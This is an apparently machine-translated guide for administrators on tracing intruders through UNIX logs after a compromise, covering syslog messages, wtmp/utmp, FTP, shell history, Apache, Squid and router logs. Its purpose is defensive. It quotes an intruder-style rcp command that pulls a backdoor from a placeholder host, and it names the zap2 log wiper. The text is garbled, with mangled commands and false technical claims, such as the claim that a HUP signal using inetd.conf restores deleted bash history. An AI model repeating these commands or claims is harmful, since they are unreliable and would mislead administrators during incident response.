How to review the logs of compromised systems

After the UNIX system is compromised, it is important to determine the loss and the source address of the intruder's attack. While most intruders know how to use a compromised computer as a springboard to attack your server, their target information collection (exploratory scans) before they launch a formal attack is often started from their working computers, The following describes how to analyze the IP of an intruder and determine it from the logs of an intrusion-affected system.





1. Messages





/var/adm is a UNIX log directory (/var/log under Linux). There are quite a few ASCII-formatted log files, of course, let's focus first on the messages file, which is generally a file of interest to intruders, and records information from the system level. The following is a record message showing the copyright or hardware information:





Apr 19:06:47 www login[28845]: FAILED login 1 from xxx.xxx.xxx.xxx, User isn't known to the underlying Authenticati On module





This is the record information for login failure: APR 22:05:45 game pam_pwdb[29509]: (login) session opened for user Ncx by (uid=0).





first step should be Kill-hup cat '/var/run/syslogd.pid ', of course, it's possible that the intruder has done it.





2. Wtmp,utmp logs,ftp Log





You can find a file named Wtmp,utmp in the/var/adm,/var/log,/etc directory that records when and where the user logged on to the host, and there is one of the oldest and most popular zap2 in the hacker software (the compiled filename is generally called Z2, or wipe), which is used to "erase" the user login information in these two files, however, because of laziness or slow network speed, many intruders did not upload or compile the file. The administrator can use the Lastlog command to obtain the source address of the intruder's last connection (which, of course, could be a springboard for them). FTP log is generally/var/log/xferlog, the file details of the ftp file upload time, source, filename, etc., but because the log is too obvious, so a bit more sophisticated intruders will almost not use FTP to pass files, they generally use RCP.





3. Sh_history





gain root permissions, intruders can build their own intrusion account, the more advanced technique is to give similar uucp,lp and other infrequently used system username password. After the invasion, even if the intruder deletes a file such as. sh_history or. bash_hi-story, executing kill-hup ' cat/var/run/inetd.conf ' will write back the Bash command records that remain in the page of memory to disk. Then execute find/-name.sh_historyprint and carefully review each suspicious shell command log. You can find the. sh_history file in/USR/SPOOL/LP (LP Home dir),/usr/lib/uucp/, and possibly find a similar FTP xxx.xxx.xxx.xxx Or Rcpnobody@xxx.xxx.xxx.xxx:/tmp/backdoor/tmp/backdoor This can display an intruder IP or domain name command.





4. HTTP Server Log





This is the most effective way to determine where the intruder's real attack originated. Take the most popular Apache server for example, in the ${prefix}/logs/directory you can find access.log this file, which records the visitor's IP, access time and requested access to the content. After the invasion, we should be able to find information similar to the following in this file: record:xxx.xxx.xxx.xxx[28/apr/2000:00:29:05-0800] "Get/cgi-bin/rguest.exe" 404 -XXX.XXX.XXX.XXX[28/APR/2000:00:28:57-0800] "get/msads/samples/selector/showcode.asp" 404





This indicates that an intruder from IP xxx.xxx.xxx.xxx attempted to access the/msads/samples/selector/showcode.asp file at 0:28 on April 28, 2000, which is using the Web CGI scanner Left behind the log. Most web scanners ' intruders often choose their nearest servers. Combined with attack time and IP, we can know a lot of information about intruders.





5. Core Dump





a secure and stable daemon does not "dump" the core of the system while it is running, and when intruders exploit a remote exploit, many services are executing a getpeername socket function call, so the intruder's IP is also stored in memory.





6. Proxy Server Log





Proxy Server is a large and medium-sized enterprise network often used as an interface for internal and external information exchange, it faithfully records each user visited





, including the access information of the intruder. Take the most commonly used squid agent as an example, usually you can find Access.log this huge log file under/usr/local/squid/logs/. You can get squid's log analysis script at the following address: http://www.squid-cache.org/Doc/Users-Guide/added/st. HTML through analysis of sensitive file access logs, You can know when and who visited these supposedly confidential content.





7. Router Log





the router does not record any scans and logins by default, so intruders often use it as a springboard to attack. If your corporate network is divided into military and demilitarized zones, adding a router's logging will help track intruders later. More importantly, for administrators




For
, such a setting would determine whether an attacker was an internal thief or an external robber. Of course, you need an additional server to place the Router.log file.





, look out!





It is not possible for intruders to attempt to establish a TCP connection with the target in the entire process of executing an attack, there are many subjective and objective reasons for intruders, and it is quite difficult to keep the log out of the attack.





If we spend enough time and energy, we can analyze the intruder's information from a lot of logs. As far as the intruder's behavior is concerned, the more permissions they get on the target, the more they tend to use a conservative approach to establish a connection to the target machine. Careful analysis of the early logs, especially the ones that contain the scans, gives us a lot more to gain.





Log audit only as a passive defensive means after the invasion, the initiative is to strengthen their own learning, timely upgrade or update the system, to be prepared is the most effective way to prevent intrusion.